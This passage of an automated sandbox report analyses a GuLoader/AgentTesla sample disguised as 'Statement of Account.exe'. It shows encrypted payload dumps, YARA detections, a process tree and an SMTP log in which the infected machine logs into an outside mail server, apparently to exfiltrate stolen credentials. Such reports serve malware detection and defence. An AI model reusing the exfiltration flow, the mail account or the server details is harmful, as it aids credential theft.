                                                        2021-10-13 12:39:36 UTC203INData Raw: b2 a5 9c c3 42 13 79 db 53 90 6d 69 9d 62 2f ef 71 e4 b8 ee cd e8 ba bc c8 6a 4f 50 82 f2 54 c0 68 5c 20 ea 82 c8 de d2 5b 89 de 0b e0 7b 24 52 94 33 ed c1 11 6d ea a9 1b 4c ac 8c 50 ab 28 c8 cd 24 de cf ee 8f b9 34 f4 63 d5 13 2e d3 33 96 ed a5 90 6a e2 42 f3 9f 9b 6a 73 d7 73 9a 98 e6 2e 98 26 be 30 15 52 6e 24 ac 9b 01 46 bd 57 43 a6 64 ea 3e 44 69 bb cc 5b a5 38 51 65 d8 9b a5 7e c5 60 bc f4 78 ff b8 99 06 8f 6c f2 cd 68 f9 4b 71 3b 6b a2 26 19 bc 36 06 95 50 fe 27 3c 86 cf b0 b3 5b 86 ff de 79 aa 6c 9e 3a 22 17 5e a0 ae d0 35 22 f6 0f 2d 5d f2 8b 89 6a 1f 8c b0 ca b9 19 62 86 dc 53 12 29 e4 ce 2c 54 d7 ac 03 09 4a f0 31 05 57 0d f3 2e 62 77 3c 2a 82 64 76 e9 99 12 c2 c3 1a 8e 26 e4 61 41 da 00 c6 63 e5 3f 32 e4 64 f2 95 1c b3 39 42 69 1b 75 42 19 62
                                                        Data Ascii: BySmib/qjOPTh\ [{$R3mLP($4c.3jBjss.&0Rn$FWCd>Di[8Qe~`xlhKq;k&6P'<[yl:"^5"-]jbS),TJ1W.bw<*dv&aAc?2d9BiuBb
                                                        2021-10-13 12:39:36 UTC204INData Raw: b7 5d 18 2c a7 3b fb ef 4d ac f6 b8 0f f5 f3 8a 45 b2 1a 12 54 46 c0 3d 47 80 48 0a 1c 06 7d ba 89 5d ad 94 fe 3d 81 a4 11 c9 dd 2e e4 90 ae ab c0 a5 b0 85 02 8a 04 fa e6 c9 95 5f d1 e7 f8 37 ee 1b 59 2f 29 9c 64 bf 9f 7e 7b 04 a6 77 03 62 36 04 93 fc bf 27 b9 df db fd db fc 90 a7 e3 51 fc 20 b9 b7 41 f1 c3 27 2c 45 b9 1b 36 71 51 b6 6f 11 7b 3d fa f1 e4 ba 89 90 e7 f8 7d cd 79 49 3b 07 6e 38 f3 e3 93 12 1b 37 fb 3d 28 8f f1 77 d3 a6 1b 4f cd 1f dd 78 51 e1 6d 06 2a 90 0b 69 d8 5e 33 cb d8 d3 df d7 ec 5b 35 35 8e 3f 52 bd 4f a8 af 58 12 59 2a ff 05 ec 9a 19 eb 85 42 d3 91 3c eb 81 e5 c4 b0 8e 34 47 bb f9 82 92 a2 49 02 63 0a e2 ad 6b fe a5 c5 57 c8 3a 5d 8d 78 2a ca 3a 04 7a 50 9b c5 02 ec fe 70 1b bc 84 06 aa 58 a8 dd a5 90 c3 74 38 79 a8 66 90 6a 59 b2
                                                        Data Ascii: ],;METF=GH}]=._7Y/)d~{wb6'Q A',E6qQo{=}yI;n87=(wOxQm*i^3[55?ROXY*B<4GIckW:]x*:zPpXt8yfjY
                                                        2021-10-13 12:39:36 UTC205INData Raw: 8c e4 53 ff 8c 50 33 1b 5a 4a f2 c0 50 d3 aa aa ed 53 61 14 94 88 ca 8b 48 c9 2d 63 46 3d d4 70 23 1a 51 12 91 14 2d d1 2e 0d ad 15 22 b8 fb 4d 78 31 40 e6 12 54 22 a8 d7 d8 79 ac ad 9c 7e 6e 3a 74 16 8c ab 83 66 da 51 cf 0b 01 6c 90 8d 0e 81 5b 06 57 a4 4c 76 ca f7 a8 36 1c 70 95 1b 50 14 7c 57 9b dd e6 44 24 66 75 1f 34 f6 50 7f 68 06 aa ee f1 30 69 39 a9 98 88 2b ba 71 15 6e e2 a9 b3 83 f5 65 fe e6 09 24 e4 90 52 7b e0 c4 5f 15 26 f7 47 30 41 9a ed 9b 8d d2 ff ea c1 50 d6 85 8a 50 dc d9 a0 88 a2 67 6c ec 03 c2 e9 21 cd ee b8 c9 ae 9c 23 08 39 d4 ff e1 98 61 24 ec f6 bb 27 51 b8 67 80 96 c5 a2 5d a3 2b 25 1d 98 f6 38 87 d2 ff 6d 73 27 35 34 05 f1 a4 53 ee cb 63 cd 5b e3 30 b6 1a 9e 32 b9 39 60 e0 fc fa ce bb fc 6d b4 54 06 49 90 26 ff e5 51 df a2 a4 3f
                                                        Data Ascii: SP3ZJPSaH-cF=p#Q-."Mx1@T"y~n:tfQl[WLv6pP|WD$fu4Ph0i9+qne$R{_&G0APPgl!#9a$'Qg]+%8ms'54Sc[029`mTI&Q?
                                                        2021-10-13 12:39:36 UTC207INData Raw: 5d 91 34 ee c0 1e 7a f9 95 13 5b a0 93 4a 92 35 c3 be 02 d8 b6 f8 8f d6 34 f2 02 c2 1e 33 ef 3e 8b e7 a7 88 6a 8b 4a f8 eb 85 54 71 cc 79 97 82 92 12 88 26 ae 1a 22 5d 67 2b bd de 16 55 87 62 4f bf 67 ed 5d 6c 6f dc ea 46 ac 3f 51 2b fa 96 a0 4f fb 6c ab c1 74 ff a3 f7 50 a7 77 e8 d8 47 fc 40 4d 2e 58 b1 32 01 a1 59 3e b1 5d f1 36 03 82 c3 b1 8b 3a a0 fc c9 12 a8 7d af 1d 05 17 48 b5 b2 d3 2f 22 fe 3c 39 51 f1 8d b5 7b 29 81 bf db c9 20 78 8e f0 3c 0d 1e f5 e2 1d 5d d0 cf 02 05 4e db 0d 19 5c 7f c1 2c 73 46 0c 4f a6 62 66 c3 85 0f ce c2 00 8e 12 ec 61 6e ca 18 ce 72 fe 38 76 d2 6e e2 93 10 ae 63 66 67 1b 14 76 05 7c e9 cb 26 fb 98 05 49 61 c3 6c 08 f2 c8 32 e2 ca 43 ae a7 d8 4e fa ae 92 2b 71 8c b2 2a 9e 14 00 05 c3 9a 8a 40 9a a0 62 1b 3a 53 48 f2 c1 41
                                                        Data Ascii: ]4z[J543>jJTqy&"]g+UbOg]loF?Q+OltPwG@M.X2Y>]6:}H/"<9Q{) x<]N\,sFObfanr8vncfgv|&Ial2CN+q*@b:SHA
                                                        2021-10-13 12:39:36 UTC208INData Raw: ce de c0 8b aa 25 96 38 f8 f7 e7 82 26 a2 d0 e9 0f ef 05 59 2b 3f b2 73 c6 dc 5c 74 10 99 6a 18 79 2d 04 93 f4 b5 33 c9 d9 cc ec cb d9 8f ab e4 68 da 21 a8 b3 47 df d4 5e 78 59 9b 0a 07 53 56 b6 68 0c 7b 3c ef f9 f3 85 89 9b e7 fe 7c c0 62 4c 37 1b 4d 12 e4 fb fe 35 2c 20 f0 4d 0f b2 ee 62 dd b9 38 76 c1 12 b8 48 12 c7 71 0e 2a 83 1c 73 d8 49 2e b2 d6 d8 d2 b2 cc 3e 10 35 89 08 4f aa 72 a8 a4 2c 11 52 2a da 15 82 a8 12 e1 b7 48 cc d2 0e fa 96 f5 c4 d9 9d 28 1d a7 c8 94 8f a6 53 11 74 19 92 96 77 8c b4 c5 51 d4 14 43 8e 68 33 cd 24 7d 1d 72 8a ee 03 fa e8 41 0b bb 82 04 bb 7c a9 ae b3 98 d5 47 05 17 bc 51 81 46 77 ba 69 33 fe 67 f9 8a cb c9 f2 a6 aa bb 4e 4e 55 99 f5 24 ff 74 3d 13 e7 93 87 ec ca 5d 85 db 48 c6 65 2b 33 ab 23 fa f1 15 74 a5 be 16 41 bd 95
                                                        Data Ascii: %8&Y+?s\tjy-3h!G^xYSVh{<|bL7M5, Mb8vHq*sI.>5Or,R*H(StwQCh3$}rA|GQFwi3gNNU$t=]He+3#tA
                                                        2021-10-13 12:39:36 UTC209INData Raw: 3c 05 66 45 a4 61 33 77 cc a0 d8 2c ca f0 f5 0a 6c 6b 3e 7b e8 df e7 37 a9 17 ab 61 70 7e fa e4 7f ed 2f 51 05 d4 26 11 aa de d4 56 55 05 f1 64 1f 12 28 2a ea a1 8b 21 0e 31 1d 70 58 9c 27 0e 44 48 cd bc 9b 53 7b 1c c9 e5 9a 0d c7 76 73 62 99 aa dd 86 a4 6b 82 f1 7e 37 85 90 2f 74 9b d9 1e 09 48 86 27 5d 6e cf 99 96 fd fc ad 9d df 21 ba e5 f6 1b a1 a9 d0 e3 df 1a 06 83 6d bf ef 46 ab 94 e9 8e ce fa 6f 7f 5c ad ae 89 ff 0c 4a 9c 17 52 6c 01 dc 14 ec e4 ac ce 3b de 25 54 7c ec a8 73 e7 b7 93 19 05 c2 ed 54 47 9d cb 2c 9d c2 29 9d 3e 83 d1 5f 76 f1 5d cb 2b 5a 9d 8f 8f aa d8 d4 2e d8 39 64 22 f1 55 96 88 3e a2 b3 57 ff 86 85 fd 5a b4 5d 75 32 74 9b 4c 27 d2 4a 78 77 6e 26 ef fb 30 d1 92 ba 4b ef db 65 83 ad 7b 96 fb d5 ae a7 c0 d6 5a 81 fd 4b 8d 87 2c 22 5b
                                                        Data Ascii: <fEa3w,lk>{7ap~/Q&VUd(*!1pX'DHS{vsbk~7/tH']n!mFo\JRl;%T|sTG,)>_v]+Z.9d"U>WZ]u2tL'Jxwn&0Ke{ZK,"[
                                                        2021-10-13 12:39:36 UTC210INData Raw: a7 ac 35 11 bd ca a9 34 0e 68 f5 ed a0 ea c9 eb 4d 17 19 7a 26 28 60 5f 35 72 f6 f9 08 98 5a 48 c9 6d 5e 4d c7 24 14 43 52 22 2e 33 c2 b5 a8 f8 2f d9 d5 71 64 7f f8 6f 62 6c be ea 16 b8 22 bc e6 a7 7e 47 d9 69 6c 76 47 19 d0 20 19 bf 96 de 52 49 16 71 03 25 04 2e 2f e0 b7 83 2d 00 30 0d 51 53 99 27 04 4d 47 c3 92 92 4d 6b 6c 46 a2 95 66 d3 1f 63 0e 97 d7 c2 87 b6 0b 91 8c 69 56 97 eb bc 90 96 e4 0d 71 50 8d 28 5a 6a c0 86 f2 78 b5 b0 81 ae 20 9a e4 ea 94 b5 ac d2 ef cd 08 19 87 6d b0 e7 5a ac 9d e6 92 a9 fc 48 7c 53 b5 96 8e dd 03 59 89 9e cb 7a a0 50 09 f3 8b b0 d0 2f cd 37 4b 7a f1 b5 61 e9 b6 8f 04 05 77 72 47 5e 80 c5 2c 9d 92 31 bf 3a 91 50 c8 6f e0 5c c2 25 2f 8b ba 80 b6 ca cf 20 c6 2a 5f 31 f1 50 86 8a 37 ad be c5 6f 8b 9e f3 2a bc 60 65 15 1b 97
                                                        Data Ascii: 54hMz&(`_5rZHm^M$CR".3/qdobl"~GilvG RIq%./-0QS'MGMklFfciVqP(Zjx mZH|SYzP/7KzawrG^,1:Po\%/ *_1P7o*`e
                                                        2021-10-13 12:39:36 UTC211INData Raw: 22 c3 fc 27 c3 55 24 c0 75 2e bb 96 f4 d6 57 9b 07 b8 7e 52 a2 f4 ff 8c ce ee 10 89 39 fe 9f a8 18 71 a2 7a ff 93 92 0f ed 26 f1 3f 47 52 00 2f c9 df 79 3b df 29 2a ca 19 06 2b 18 1e ce 3b 2f dd 53 38 2e b0 f2 c1 33 af 81 c4 99 09 8b d2 ea 03 ce 04 a4 ad 19 95 32 3b 4f 0e d1 42 6e dc 59 6b cd 2d 80 47 51 f7 ae db d9 db d5 90 a9 15 c7 05 de 50 c3 57 33 d1 da ba 49 4b a5 ff 63 35 9a f3 e2 18 7a f5 d2 be 4b 58 0d c9 b3 52 64 ce a9 94 48 31 b6 4d 4c 68 1a 87 45 6f 24 08 88 43 1a 28 7c 52 f4 1a 01 9d ec 6e ba 2e 4d 8a 42 e7 15 1e 8d 77 a7 17 90 45 71 84 0a 94 fa 70 cb 45 23 03 75 77 14 6e 19 89 a5 53 e6 c5 66 22 23 ac 18 e5 0b a4 4e ff 8c 39 c7 c3 a6 23 8a ce e1 5a 7f d5 c0 41 f2 74 ed 76 bc 7d fd 29 99 e5 13 6a 62 21 29 85 aa 27 95 f8 ce 87 2b 0c 62 e0 ec a0
                                                        Data Ascii: "'U$u.W~R9qz&?GR/y;)*+;/S8.32;OBnYk-GQPW3IKc5zKXRdH1MLhEo$C(|Rn.MBwEqpE#uwnSf"#N9#ZAtv})jb!)'+b
                                                        2021-10-13 12:39:36 UTC212INData Raw: bd a7 47 b0 ca 9d 28 bd 29 24 14 52 ff 16 bd c0 09 07 55 c9 23 69 05 50 7d e7 b9 d7 49 c1 ac c0 80 92 be fa df 92 a7 16 54 dc d7 2d 86 33 8a 7b 2c ef 3a 5a 12 3a db 1c 41 1a 4f 9f bc 81 ce ec e6 67 bd 13 ae 1a 0d 5d 67 bc fc 90 00 fb 65 ed fb 95 3b 5b fa 82 03 30 ce 40 1d a1 79 3a af 59 ad 10 6c dc 6e 65 06 8c 3a 49 d9 1f 18 a2 b5 9d 49 f6 19 e8 fd 78 db 3c cd df 2d 79 29 2f bd 6c 90 7a 2e 88 c4 27 b4 ee df 8e f7 8e b8 be e7 5f 2e ea b4 e3 ea c3 be cf 04 76 ec f6 13 82 d8 80 25 9e 47 b2 48 0f 4d af 5b 05 1a 20 fd 18 f3 80 83 2c 75 ef eb 7f cd bf 63 df c5 f5 a4 2a 7b 02 ca b6 4c 1b 38 d0 05 46 99 06 0b 89 b8 24 7f d0 d4 b1 0d 2e 2b 6f 8d 56 9d 03 33 5c 94 e4 89 a0 b3 23 64 09 09 a7 1b 5a 2e f6 53 8e 80 7e 17 85 fe 0a 32 c7 fa 24 c1 46 a8 c3 69 be b1 9b ee
                                                        Data Ascii: G()$RU#iP}IT-3{,:Z:AOg]ge;[0@y:Ylne:IIx<-y)/lz.'_.v%GHM[ ,uc*{L8F$.+oV3\#dZ.S~2$Fi
                                                        2021-10-13 12:39:36 UTC214INData Raw: 61 2e d6 d1 e2 8f 7f 7b 08 7d e5 ca f7 b4 02 21 a0 74 f3 2c d3 fd f8 e0 2d 4d 2b 50 61 1a ad 84 5e 42 57 0a e2 f7 63 19 3a 3c 6a b8 81 27 1f 23 9e 60 52 97 29 01 53 52 47 29 9e 4d 7c 6f 45 fa 8a 66 db 12 74 1e 09 7e c2 8d a3 18 12 81 6e 58 99 f0 28 07 11 71 0e 62 47 02 62 54 7a df 0a 5a fb f2 bf 0e e6 2e 9a e4 ed 07 27 a0 d0 fe d1 07 04 8a 78 a3 6a 4f aa 94 f5 01 80 f4 6f 7d 48 a0 35 82 dd 1e 4b 9d 96 de 7d 30 5e 18 e3 ec be 4c 73 d4 0b 56 6b ed bd 76 e3 bf 8e 1d 0b 50 fe 73 5e 8f a2 2c 8a ba 30 a0 22 8c 53 cb 53 f3 4e 48 04 2e 9c 92 8b a7 d1 d4 33 de 24 77 30 ee 4e 8b 88 37 a2 a2 d1 5b 99 91 da 39 af 61 6a 2e 04 87 7b 24 d2 4a 78 77 6f 27 e6 fa 3c c2 91 b3 55 f6 de 7c 93 ae 63 82 e7 5d 0e a6 d2 45 9a 55 ea ea 28 94 be 66 1f ac 9e 82 66 a4 74 33 56 48 78
                                                        Data Ascii: a.{}!t,-M+Pa^BWc:<j'#`R)SRG)M|oEft~nX(qbGbTzZ.'xjOo}H5K}0^LsVkvPs^,0"SSNH.3$w0N7[9aj.{$Jxwo'<U|c]EU(fft3VHx
                                                        2021-10-13 12:39:36 UTC215INData Raw: c1 40 d0 65 38 d6 35 b6 8f 16 81 23 00 15 ce d0 24 a9 5e 38 39 c0 ff d4 35 b5 1e d7 99 10 8b cb ea 04 db 10 e9 b1 0a c1 28 17 5e 1c 51 e2 6c c7 d8 28 c5 3a 1c e7 4d e0 27 9f c0 55 c8 9e a0 1c c1 16 c7 5e 53 f1 17 dc cf b7 59 3e b9 6f cb 68 83 f2 e5 16 54 fc db a7 cb 65 05 fb 33 13 67 25 98 99 60 2c aa d2 6d 7d 26 99 5a 62 24 11 92 ca 56 3d 69 ce 40 06 16 01 a9 6b 8b a8 75 80 50 01 e0 0f 09 8d b6 94 ad 53 71 95 19 9f fa 7d de 45 36 0e 68 7d 0c 68 19 84 ad 4f f3 c8 75 2d 2c a7 1b 0c 9f ae 4e ff 83 32 da c4 b9 28 99 e2 fb 4d 64 db 5d f9 f6 74 ee 2b a0 f1 f1 26 1b 5d 0e 65 ff 7c 25 89 a2 39 9e d0 d2 8c 3e 12 65 e0 ec ae ea c9 fa 5a 7e 11 60 ad 12 6f 71 39 7d ea 70 57 9a 54 73 ce 7c 50 de 10 11 1a 5f 45 be 66 3c 46 d6 26 55 31 dd d9 f5 1f ec 5c 1b 76 ff b6 e1
                                                        Data Ascii: @e85#$^895(^Ql(:M'U^SY>ohTe3g%`,m}&Zb$V=i@kuPSq}E6h}hOu-,N2(Md]t+&]e|%9>eZ~`oq9}pWTs|P_Ef<F&U1\v
                                                        2021-10-13 12:39:36 UTC216INData Raw: 58 2a ec fe 81 13 23 dc 0e 4f 14 5f 95 99 86 cd e2 ec ef bb 13 ac 0a 3d 42 69 39 5e 84 8a f6 7f 67 5a 80 3d 7a f3 96 00 33 6e 4d 33 89 6c af 04 44 a7 89 db 5f c9 71 15 be ba e4 ca 93 a8 b9 33 3b 5a 79 49 e8 fd 98 d2 37 c3 d3 24 79 23 29 b5 64 8c f3 63 9c cb 25 a9 f4 5e 98 d5 82 be be f8 d2 b6 e6 bc e7 fa d5 3d 67 87 41 ed de 08 8d dd ae 34 0a 6c 21 7c 44 4f 2e 01 0e 19 32 ed 90 4e 81 a5 22 74 cb ed 7b 5c a5 de d8 d6 f5 b7 2f 7a 17 db 34 f1 1e 36 de 0d 45 74 17 8a cc ae a2 8a 4a 4f bf 43 3b 39 ed 98 54 91 0d 3d 56 89 ee 87 ae a2 32 f6 b0 0b ad 1a 52 33 f8 5e 79 85 70 19 8f ec 6c 2f c9 f8 24 32 47 a6 cf 61 ab b4 98 f0 d3 55 9b 13 25 d7 42 b6 6b ff 0e 68 e6 19 8f 25 95 97 d2 1c 34 a3 16 f7 fb 95 6b ef 58 f9 5e 5b 2e 05 4b c1 d6 71 20 f8 25 3d c7 03 80 1e 04
                                                        Data Ascii: X*#O_=Bi9^gZ=z3nM3lD_q3;ZyI7$y#)dc%^=gA4l!|DO.2N"t{\/z46EtJOC;9T=V2R3^ypl/$2GaU%Bkh%4kX^[.Kq %=
                                                        2021-10-13 12:39:36 UTC217INData Raw: 20 9c 91 54 99 27 0c c6 44 c4 9c 9c c3 6d 7f c7 eb 08 6c d6 1f 61 8f 8f c3 c0 83 36 0e 95 90 6c d6 9e ff 28 07 12 61 0d 7e d5 6f 26 5b 7d 4e 5d e7 ff ed 2d 76 a5 23 a7 ed fc 13 b6 28 57 e5 c4 06 84 26 6c a3 69 aa ae 9d e3 89 c8 f7 47 7b 5d b0 a4 0e 5a 05 47 89 93 c5 e8 c5 cf 95 34 f0 2c 29 3b d5 2b 56 6a 6c 4d 76 e9 b3 81 98 f3 4c 72 53 45 9e d9 b1 6b b5 ac 59 36 9b 51 c1 61 71 b8 d8 b9 e6 97 8d 81 ac d3 c3 ae 22 2a ea c8 e1 d2 43 98 bf 48 aa de 5a 87 91 6f d3 bc 6c f7 d9 11 92 4c 30 72 ac 6b f9 96 2e ef f9 2a 5f 70 af c8 26 c7 f4 5e ab 73 90 f7 ce 2b 4b d2 44 2b 4b d8 6f 9f 15 40 f6 df 4a 8c 82 66 aa 6e 34 4a da 15 1e af fc 14 07 e0 23 12 ea e5 56 77 7f 6a c1 cb 80 b0 a1 9f 96 8c 7a 2e 92 a5 57 40 db da 28 9a bf 2f 76 37 f0 70 56 17 2b c2 02 49 07 41 92
                                                        Data Ascii: T'Dmla6l(a~o&[}N]-v#(W&liG{]ZG4,);+VjlMvLrSEkY6Qaq"*CHZolL0rk.*_p&^s+KD+Ko@Jfn4J#Vwjz.W@(/v7pV+IA
                                                        2021-10-13 12:39:36 UTC219INData Raw: c7 db 65 d9 08 99 5f 49 ef a3 d7 d5 59 db b8 bd 07 dd 99 7e 43 54 63 aa d1 c5 b1 55 3f b0 71 58 a9 97 fc 66 16 47 f1 db a7 db ec 03 fb 33 5b 67 cd 98 83 e9 39 ac de f0 64 32 8c 4d 78 b8 a8 81 59 97 20 7f 6f f0 15 85 88 f4 63 af aa 65 0f 45 85 25 1e 89 74 ae 11 85 5e f7 24 16 83 66 7d c5 4a 29 17 f4 71 19 65 31 8c b4 d3 ff c6 48 24 25 be 88 61 9c a1 44 f7 99 b6 7f c7 a9 a7 9f c3 f6 7f 71 dc ce dd 52 67 7d ea a6 f4 c4 35 9b ed 1d f6 db 3d 39 06 a4 07 97 d7 dd 08 9f 01 72 7c 40 a3 fd 4d a8 c9 1f 08 e9 a3 1d 7a 7a 3f 6e e1 70 44 97 49 79 48 c1 4d de 13 24 13 62 42 b1 e2 88 4d d8 a3 f8 2e ca 45 59 05 66 71 13 62 6c 6e e7 24 3a 2b ab 4e 72 7d 47 e8 71 c5 2f 56 2b 50 84 12 aa 17 d4 57 53 16 72 33 28 34 2b 2f fa 2b c6 34 0f 2c 19 79 5a 9e 21 04 5b 45 d8 99 94 4b
                                                        Data Ascii: e_IY~CTcU?qXfG3[g9d2MxY oceE%t^$f}J)qe1H$%aDqRg}5=9r|@Mzz?npDIyHM$bBM.EYfqbln$:+Nr}Gq/V+PWSr3(4+/+4,yZ![EK
                                                        2021-10-13 12:39:36 UTC220INData Raw: 0a 51 b5 08 7e 5e c7 79 00 ac 3b 41 cb 9d bd ab b2 9e 5b 77 5c fa 7c 3d d3 39 cd dd 2c 77 2b 2a bd 6c 82 fb 6b 92 c3 2d a1 fc 5d 9f f5 80 b6 b0 e9 51 33 e4 ba ed ff d2 3c 76 06 78 e2 fe 0e 8c d3 a0 25 8b 55 30 fd 0d 5e af 48 04 1d 35 ef 9a 46 82 8d 22 7e cf eb 6a dc 3d da dd d6 f5 b7 2b 7c 17 db 34 f5 19 34 de 1d 41 9b 14 aa cc aa 24 83 ca d3 bb 3b 3b 39 6d 9c 54 93 0d 3d 52 89 ea 87 ae a6 32 e6 b0 0a a9 14 52 33 f8 0a 89 85 f0 19 8b ec 63 2f c9 fc 24 c2 47 a6 cd 67 ac b7 9e fa d6 53 86 6a a5 7b c7 b0 76 ee 8e c0 e0 1e 8b 2d 9d 9f da 18 14 a3 1e ff f6 92 61 6d 52 f1 56 47 33 00 43 c9 de 79 25 d8 27 37 cf 0b 84 3f 05 1b dc b9 36 50 56 25 2b 0d 77 ca 3b 19 01 d9 84 0c 96 d7 f7 06 c6 02 84 e4 87 93 2f d4 4a 0e d0 47 6d d5 59 68 d0 28 9d e6 4e c6 a6 df dd 0d
                                                        Data Ascii: Q~^y;A[w\|=9,w+*lk-]Q3<vx%U0^H5F"~j=+|44A$;;9mT=R2R3c/$GgSj{v-amRVG3Cy%'7?6PV%+w;/JGmYh(N
                                                        2021-10-13 12:39:36 UTC221INData Raw: e4 86 8f 99 c1 b2 84 44 c9 ad 96 63 cb c2 b7 9f f3 34 70 ea 2c d2 8a 23 db e9 da a2 a6 9e 23 0e 38 93 99 b1 d2 07 6b ae b7 f7 48 01 e1 3a 93 87 dd b8 56 a3 5f 33 1c bc db 18 9f d8 ff 7d 70 27 0f 64 4f 97 eb 11 af 87 10 92 4d f4 32 b7 01 98 28 b3 07 3e 93 af ae 97 f9 a6 5c ae 4b 1e 65 9d 34 f9 b4 32 a6 9e f8 3b f6 f0 8a 5a d0 11 0e 1e 14 9f 4e 22 f2 48 79 79 72 22 ef fa 38 df 94 bd 48 f3 d6 74 a7 a9 7b 97 f5 dc ab a7 c0 c4 da 40 f8 6b 8d 95 ac e7 5f a2 82 8c 68 ac 69 36 58 5a f9 16 bf dc 11 15 60 cf 03 6a 0d 58 65 ff bf d0 4a c9 be a9 98 94 9e fa c2 80 25 bb 52 dc d6 35 94 b1 27 78 2a fe 7e 58 14 23 df 0c 41 1a 4f 9b 9c 81 ce ec e2 e7 bd 13 ae 16 2d 5e 75 3e 59 81 82 fe 77 6f 52 89 3d 7b fb 83 12 b2 cb 4c 3d a4 6b b8 0a 51 b5 08 7e 5e c7 79 00 ac 3b 41 cb
                                                        Data Ascii: Dc4p,##8kH:V_3}p'dOM2(>\Ke42;ZN"Hyyr"8Ht{@k_hi6XZ`jXeJ%R5'x*~X#AO-^u>YwoR={L=kQ~^y;A


                                                        SMTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Oct 13, 2021 14:41:13.121690989 CEST5874982165.60.11.90192.168.11.20220-viper.itsoul.com ESMTP Exim 4.94.2 #2 Wed, 13 Oct 2021 18:11:17 +0530
                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                        220 and/or bulk e-mail.
                                                        Oct 13, 2021 14:41:13.122230053 CEST49821587192.168.11.2065.60.11.90EHLO 287400
                                                        Oct 13, 2021 14:41:13.490446091 CEST5874982165.60.11.90192.168.11.20250-viper.itsoul.com Hello 287400 - 102.129.143.96 - [127.0.0.1]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-AUTH PLAIN LOGIN
                                                        250-NOOP
                                                        250-SIZE 157286400
                                                        250 HELP
                                                        Oct 13, 2021 14:41:13.492100000 CEST49821587192.168.11.2065.60.11.90AUTH login aGVtYW50QGZyaWVuZHNlcXVpcG1lbnQuY29t
                                                        Oct 13, 2021 14:41:13.643901110 CEST5874982165.60.11.90192.168.11.20334 UGFzc3dvcmQ6
                                                        Oct 13, 2021 14:41:13.809865952 CEST5874982165.60.11.90192.168.11.20235 Authentication succeeded
                                                        Oct 13, 2021 14:41:13.810405016 CEST49821587192.168.11.2065.60.11.90MAIL FROM:<hemant@friendsequipment.com>
                                                        Oct 13, 2021 14:41:13.957331896 CEST5874982165.60.11.90192.168.11.20250 OK
                                                        Oct 13, 2021 14:41:13.957720995 CEST49821587192.168.11.2065.60.11.90RCPT TO:<hemant@friendsequipment.com>
                                                        Oct 13, 2021 14:41:14.114407063 CEST5874982165.60.11.90192.168.11.20250 Accepted
                                                        Oct 13, 2021 14:41:14.114773035 CEST49821587192.168.11.2065.60.11.90DATA
                                                        Oct 13, 2021 14:41:14.268451929 CEST5874982165.60.11.90192.168.11.20354 Enter message, ending with "." on a line by itself
                                                        Oct 13, 2021 14:41:14.270813942 CEST49821587192.168.11.2065.60.11.90.
                                                        Oct 13, 2021 14:41:14.546084881 CEST5874982165.60.11.90192.168.11.20250 OK id=1madaN-0006K9-PC
                                                        Oct 13, 2021 14:42:52.406965017 CEST49821587192.168.11.2065.60.11.90QUIT
                                                        Oct 13, 2021 14:42:52.547036886 CEST5874982165.60.11.90192.168.11.20221 viper.itsoul.com closing connection

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: Statement of Account.exe PID: 2204 Parent PID: 7744

                                                        General

                                                        Start time:14:38:13
                                                        Start date:13/10/2021
                                                        Path:C:\Users\user\Desktop\Statement of Account.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\Statement of Account.exe'
                                                        Imagebase:0x400000
                                                        File size:135168 bytes
                                                        MD5 hash:1232806812F946A2AFABC5F5FE489DE5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Visual Basic
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: RegAsm.exe PID: 3428 Parent PID: 2204

                                                        General

                                                        Start time:14:38:55
                                                        Start date:13/10/2021
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\Statement of Account.exe'
                                                        Imagebase:0xf80000
                                                        File size:65440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 1544 Parent PID: 3428

                                                        General

                                                        Start time:14:38:55
                                                        Start date:13/10/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7a9dc0000
                                                        File size:875008 bytes
                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: DnDcR.exe PID: 1820 Parent PID: 4920

                                                        General

                                                        Start time:14:40:08
                                                        Start date:13/10/2021
                                                        Path:C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
                                                        Imagebase:0x140000
                                                        File size:65440 bytes
                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 0%, Metadefender, Browse
                                                        • Detection: 0%, ReversingLabs
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 4976 Parent PID: 1820

                                                        General

                                                        Start time:14:40:08
                                                        Start date:13/10/2021
